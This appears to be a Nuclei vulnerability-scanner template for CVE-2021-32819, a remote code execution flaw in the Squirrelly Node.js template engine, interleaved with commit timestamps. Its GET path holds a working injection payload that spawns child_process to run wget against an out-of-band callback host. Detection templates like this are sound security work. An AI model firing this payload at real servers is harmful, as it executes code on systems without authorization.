2021-08-20 13:19:00 +00:00
id : CVE-2021-32819
info :
2022-06-30 17:49:00 +00:00
name : Nodejs Squirrelly - Remote Code Execution
2021-08-20 13:19:00 +00:00
author : pikpikcu
2021-09-10 11:26:40 +00:00
severity : high
2021-08-20 13:19:00 +00:00
description : |
2022-06-30 17:49:00 +00:00
Nodejs Squirrelly is susceptible to remote code execution. Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is currently no fix for these issues as of the publication of this CVE. The latest version of squirrelly is currently 8.0.8. For complete details refer to the referenced GHSL-2021-023.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
2023-09-06 12:09:01 +00:00
remediation : |
Update to the latest version of Nodejs Squirrelly template engine to mitigate the vulnerability.
2021-08-20 19:42:52 +00:00
reference :
- https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/
2021-08-20 13:19:00 +00:00
- https://www.linuxlz.com/aqld/2331.html
2021-08-20 19:42:52 +00:00
- https://blog.diefunction.io/vulnerabilities/ghsl-2021-023
2022-06-30 17:49:00 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-32819
2023-07-11 19:49:27 +00:00
- https://github.com/squirrellyjs/squirrelly/commit/c12418a026f73df645ba927fd29358efe02fed1e
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 8.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-32819
2023-07-11 19:49:27 +00:00
cwe-id : CWE-200,NVD-CWE-noinfo
2023-10-27 16:34:45 +00:00
epss-score : 0.90688
2023-12-12 11:07:52 +00:00
epss-percentile : 0.9855
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:squirrelly:squirrelly:8.0.8:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : squirrelly
product : squirrelly
2023-12-05 09:50:33 +00:00
tags : cve,cve2021,nodejs,rce,oast,squirrelly
2021-08-20 13:19:00 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-08-20 13:19:00 +00:00
- method : GET
path :
2021-08-20 19:42:52 +00:00
- '{{BaseURL}}/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//'
2021-08-20 13:19:00 +00:00
2023-09-10 13:44:34 +00:00
matchers-condition : and
2021-08-20 19:42:52 +00:00
matchers :
2021-08-20 13:19:00 +00:00
- type : word
2021-08-20 19:42:52 +00:00
part : interactsh_protocol # Confirms the HTTP Interaction
2021-08-20 13:19:00 +00:00
words :
2022-06-30 17:49:00 +00:00
- "http"
2023-09-02 21:59:37 +00:00
- type : word
part : interactsh_request
words :
- "User-Agent: Wget"
2023-12-29 09:30:44 +00:00
# digest: 490a0046304402206b4e7926426f079ab5c5a2d6e128728eab0b2d1f44b76e709d924d2f5415d597022065d67e541239508c5654bed16a582dfb06a2817aaaf7b6f105dab2204002a1e7:922c64590222798bb761d5b6d8e72950